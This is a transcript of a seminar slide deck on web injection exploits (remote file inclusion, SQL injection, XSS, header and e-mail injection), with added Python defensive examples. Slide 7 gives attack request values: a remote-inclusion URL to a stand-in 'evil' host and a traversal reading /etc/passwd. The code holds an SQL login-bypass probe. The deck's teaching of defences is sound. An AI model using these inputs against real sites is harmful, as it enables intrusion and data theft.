Master Semminar Injection Exploits

Date post: 09-Apr-2018
Upload: karol-stepniewski

Transcript
  • 8/8/2019 Master Semminar Injection Exploits

    1/24

    Web security - Injection exploits

    Karol Stępniewski


    2/24

    Presentation topics

    What are injection exploits?

    Why are they dangerous?

    Basic types of injection exploits:

    Remote file inclusion

    Cross-site scripting

    SQL injection

    Other

    Examples of securing an application against exploits


    3/24

    Injection exploit - what's that? What is an exploit?

    A piece of software or a sequence of commands which causes unintended behaviour to occur in computer software.

    Usually based on bugs or other vulnerabilities which exist in a computer application.

    Possible effects of using an exploit:

    Privilege escalation

    Denial of service

    Gaining control of the system


    4/24

    Injection exploit - what's that?

    An injection exploit uses some input or data entry feature to introduce data or code that subverts the intended operation of the system.

    Usually these exploits take advantage of vulnerabilities resulting from insufficient validation of input data.

    The way the code is injected classifies exploits into categories.

    1st place in the OWASP Top 10 ranking of web application exploits.

    Used to attack IBM, Yahoo, Apple, ...


    5/24

    Remote file inclusion

    Remote file inclusion allows an attacker to include a remote file, usually through a script on the web server.

    Most often found on websites based on scripting languages like PHP, ASP, etc.

    Can lead to:

    Code execution on the web server

    Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)

    Denial of service (DoS)

    Data theft/manipulation


    6/24

    Remote file inclusion - example

    Trivial example: we want to include a file based on which colour the user has chosen in a form. We could use the following construction (PHP and HTML code). We give the user only two options, red and blue. The form is passed to the server using the GET method.


    7/24

    Remote file inclusion - example

    If the user finds out how to change the possible values (which is relatively simple with the GET method), he can provide his own file to include, or can even tell the server to include its own files, which normally shouldn't be available outside the server system.

    Examples:

    /vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hosted file containing an exploit.

    /vulnerable.php?COLOR=../../../../../../../../etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal).

    %00 is a NULL metacharacter which removes the .php suffix that is appended in the script.


    8/24

    Remote file inclusion

    RFI is a very common exploit for different CMSs and other applications which provide plugin systems, downloading and uploading of many files, etc.

    Even many commercial CMSs were vulnerable to RFI.


    9/24

    Remote file inclusion - how to defend

    Remove instructions which include files whose names are taken directly from variables.

    Use a prepared set of possible files (chosen with conditional instructions).

    Read privileges on the server only for files needed by the website.

    On some server systems (e.g. BSD-like) use jails for the server filesystem.
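The following Python is an added example, not the deck's PHP code, that puts the slide 6 construction next to the "prepared set of possible files" defence from this slide. The names `build_include_path_unsafe`, `resolve_include_safe`, `looks_like_inclusion_probe` and the red/blue file table are assumptions made for the example; the request values are the ones quoted on slide 7.

```python
# Constructed allowlist: the form offers only the two colours the deck mentions,
# and each maps to a fixed file name. The parameter is a key, never a path.
ALLOWED_COLORS = {"red": "red.php", "blue": "blue.php"}


def build_include_path_unsafe(color: str) -> str:
    """The vulnerable construction from slide 6: the COLOR parameter is pasted
    straight into the include path and a .php suffix is appended. Nothing is
    checked, so a URL, '../' sequences or a trailing NUL byte pass through
    unchanged. The appended suffix is why the slide 7 URL ends in '?': it turns
    '.php' into a harmless query string, and why the NUL once cut it off."""
    return color + ".php"


def resolve_include_safe(color: str):
    """Hardened version: the parameter only selects an entry of a fixed table.
    Anything not in the table is refused (None), so the client never chooses a
    path and no traversal, URL or NUL byte can reach the include call."""
    return ALLOWED_COLORS.get(color)


def looks_like_inclusion_probe(value: str) -> bool:
    """Detection helper for request logs: flags the three markers present in the
    deck's examples (a URL scheme, parent-directory traversal, an embedded NUL)."""
    return ("://" in value) or (".." in value) or ("\x00" in value)


if __name__ == "__main__":
    for candidate in ("red", "http://evil/exploit?", "../../../../etc/passwd\x00"):
        print(repr(candidate), "->", resolve_include_safe(candidate),
              "| probe" if looks_like_inclusion_probe(candidate) else "| ok")
```

The detection helper is for logging and alerting only; the allowlist lookup is what actually closes the hole, because a rejected key produces no file access at all rather than a filtered one.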


    10/24

    SQL injection - what's that?

    Most popular injection exploit

    Every application which uses an SQL-based database might be vulnerable

    However, if there is no SQL there is no danger.

    Happens when user input is not properly validated and escaped


    11/24

    SQL injection - example

    We want to create a simple login form. The user provides a login and password, and we check if such a user exists in the database. However, the user provides data which is a control instruction for the database. The user gets logged in without providing the correct password.


    12/24

    SQL injection - possible effects

    What could happen?

    Illegal access to the application

    Access to all data in the database

    Denial of service

    Ability to modify data

    Ability to execute code on the server

    Extremely dangerous exploit


    13/24

    How to defend against SQL injection - prepared statements

    Separates data from the statement

    The statement is compiled and might be used many times. Before compilation we place marks (placeholders) instead of data values.

    After compilation we bind the data to the statement, replacing the marks with data values.

    It's not always possible to use such statements (special types of data)


    14/24

    How to defend against SQL injection - prepared statements

    Example


    15/24

    How to defend against SQL injection - escaping

    Every special character in the provided data is replaced with an escape sequence (e.g. ' is replaced with '' or \').

    It's still error-prone

    Escape sequences depend on the database used

    It's based on blacklisting special chars, which is not an optimal solution


    16/24

    How to defend against SQL injection - escaping

    Example of escaping in PHP code using the built-in function for the MySQL database.
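The deck's prepared-statement example (slide 14) and escaping example (slide 16) are not in this transcript. The Python below is an added example written for this page, not the author's PHP/MySQL code, covering both slides with one constructed login table: the vulnerable login from slide 11, the prepared-statement version from slide 13, and quote-doubling escaping from slide 15. It uses SQLite's `?` placeholders (MySQL drivers use a different marker), and `make_db`, the `login_*` functions, `escape_sql_string` and the `alice`/`s3cret` row are all assumptions made for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the deck's login form."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")  # constructed row
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """The deck's broken login: data is concatenated into the statement, so the
    user's text becomes part of the SQL and can change what the query means."""
    sql = ("SELECT COUNT(*) FROM users WHERE login = '" + login
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_prepared(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Prepared statement: the '?' marks are compiled first and the values are
    bound afterwards, so whatever the user typed is compared as data and is
    never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone()[0] > 0


def escape_sql_string(value: str) -> str:
    """Escaping in the style of slide 15: a single quote becomes two single quotes.
    This is the blacklist approach: it covers the quote and only the quote, and
    the correct rules differ between database engines (SQLite has no backslash
    escape, so \\' would not work here)."""
    return value.replace("'", "''")


def login_escaped(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Same concatenation as the vulnerable version, but each value is escaped first."""
    sql = ("SELECT COUNT(*) FROM users WHERE login = '" + escape_sql_string(login)
           + "' AND password = '" + escape_sql_string(password) + "'")
    return conn.execute(sql).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"  # the textbook control-instruction input the deck describes
    print("vulnerable:", login_vulnerable(db, "alice", probe))  # True: no password needed
    print("prepared:  ", login_prepared(db, "alice", probe))   # False
    print("escaped:   ", login_escaped(db, "alice", probe))    # False
```

The escaped version happens to hold up for this one input, which is exactly the trap slide 15 warns about: it protects only against the characters somebody remembered to list, while the prepared statement protects by construction.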


    17/24

    How to defend against SQL injection - stored procedures

    SQL statements are moved from the script to the database and saved as a procedure

    The procedure is invoked with data as parameters and has a defined output

    It's not enough: we still need to separate data from the statement inside the procedure

    Main rule: do not mix data with code


    18/24

    How to defend against SQL injection - stored procedures

    Example of a safe stored procedure in a MySQL database

    A prepared statement is used here as well.


    19/24

    How to defend against SQL injection - other important things

    Validating data

    Check if the age is a number, the city name is a simple string, etc. Filtering bad data, e.g. removing letters from a phone number

    Executing statements on an account with the minimal privileges needed for that operation

    Regular updates of the database system

    Good database design


    20/24

    Cross-site scripting (XSS)

    An XSS exploit is based on injecting code into a website, which is then displayed to other users.

    Web browser security policies (the same-origin policy) do not allow scripts to work on data other than data coming from the same server the script comes from.

    When code is injected into the website, it works on the same data as the website does.

    The attacker is able to grab session data, cookies, and other important information


    21/24

    Cross-site scripting (XSS) - exploit scenarios

    Internet boards: a user adds a new post which includes a script with malicious code. If the content of the new post is not properly validated, every user who reads the post also executes the script, which might steal his cookies, session data, etc.

    Also possible using the RFI method


    22/24

    Cross-site scripting (XSS) - how to defend

    Validating and filtering the data

    No strange chars are allowed

    All control symbols are removed

    Escaping HTML tags and JS symbols

    Before displaying, the website should replace control symbols with entities.

    Defending on the client side

    Block malicious scripts (using NoScript-like add-ons, etc.)
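An added Python example (not from the deck) of the two server-side defences on this slide applied to the slide 21 message-board scenario: an allowlist check for fields that should contain nothing but plain text, and entity escaping of the post body at display time. The post text, the `render_post`/`is_plain_identifier`/`contains_markup_characters` names and the identifier pattern are constructed for the example; the script body is a placeholder comment, not a payload.

```python
import html
import re

# Constructed post for the "internet board" scenario. The script body is a
# placeholder; what matters for the defence is the <script> element itself.
CONSTRUCTED_POST = 'Nice board! <script>/* constructed placeholder */</script>'

# Allowlist for fields that should only ever be plain identifiers (usernames,
# thread tags): letters, digits and underscore, 1 to 32 characters.
PLAIN_IDENTIFIER = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def escape_for_html(text: str) -> str:
    """Output encoding: <, >, &, " and ' become entities, so the browser shows
    the text instead of interpreting it as markup or script."""
    return html.escape(text, quote=True)


def is_plain_identifier(value: str) -> bool:
    """Input validation for a field with a narrow legal alphabet: anything outside
    the allowlist is rejected, which is stricter than stripping known-bad chars."""
    return PLAIN_IDENTIFIER.fullmatch(value) is not None


def render_post(author: str, body: str) -> str:
    """Server-side rendering of one post: the author must pass the allowlist and
    the body is escaped when displayed, so stored text never becomes live HTML."""
    if not is_plain_identifier(author):
        raise ValueError("author must be a plain identifier")
    return "<p><b>" + author + "</b>: " + escape_for_html(body) + "</p>"


def contains_markup_characters(value: str) -> bool:
    """Detection helper for submission logs: flags input carrying the characters
    that HTML escaping has to neutralise, useful for spotting probing accounts."""
    return any(ch in value for ch in "<>\"'&")


if __name__ == "__main__":
    print(render_post("karol", CONSTRUCTED_POST))
```

Escaping belongs at the point of display, not at storage time: the same stored text may later be placed in an attribute, a URL or a JSON document, each of which needs its own encoding, and escaping once on input tends to double-encode or miss one of those contexts.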


    23/24

    Other injection exploits

    Frame injection - only on IE 5, 6, 7

    HTTP header injection

    E-mail injection - might be used to anonymously send e-mails via forms on a public website
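HTTP header injection and e-mail injection share one mechanism: a form value that ends up inside a header line and carries a carriage return or line feed starts a new header. The Python below is an added example, not the deck's code, of a contact-form handler that refuses such values and keeps the recipient fixed on the server. The `build_contact_mail`, `has_header_injection` and `render_headers` names, the `webmaster@example.com` mailbox and the sample field values are constructed for the example.

```python
import re

# A header value is a single line; CR or LF inside it would end that line.
HEADER_BREAK = re.compile(r"[\r\n]")


def has_header_injection(value: str) -> bool:
    """True if the value could not be emitted as one header line. The same test
    applies to anything copied into an HTTP response header such as Location."""
    return HEADER_BREAK.search(value) is not None


def build_contact_mail(sender: str, subject: str, body: str) -> dict:
    """Hardened contact-form handler (constructed; assumes a fixed site mailbox).
    Every field that becomes a header is checked for line breaks first, and the
    recipient is never taken from the form, so the form cannot be turned into a
    relay for mail to arbitrary addresses."""
    for name, value in (("From", sender), ("Subject", subject)):
        if has_header_injection(value):
            raise ValueError(f"line break in {name} field rejected")
    return {
        "To": "webmaster@example.com",  # fixed on the server, never user-supplied
        "From": sender,
        "Subject": subject,
        "Body": body,
    }


def render_headers(headers: dict) -> str:
    """Serialises the header block as CRLF-separated lines, the form a mail or
    HTTP library emits; shows why an embedded CRLF in a value matters."""
    return "\r\n".join(f"{k}: {v}" for k, v in headers.items() if k != "Body") + "\r\n"


if __name__ == "__main__":
    ok = build_contact_mail("visitor@example.net", "Question", "Hello")
    print(render_headers(ok))
    try:
        build_contact_mail("visitor@example.net", "Question\r\nX-Injected: 1", "Hello")
    except ValueError as err:
        print("rejected:", err)
```

Rejecting the request outright, rather than silently stripping the line breaks, is the better choice for a public form: it preserves the evidence for logging and gives a probing client nothing to learn about what survives the filter.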


    24/24

    That's all. Thank you!

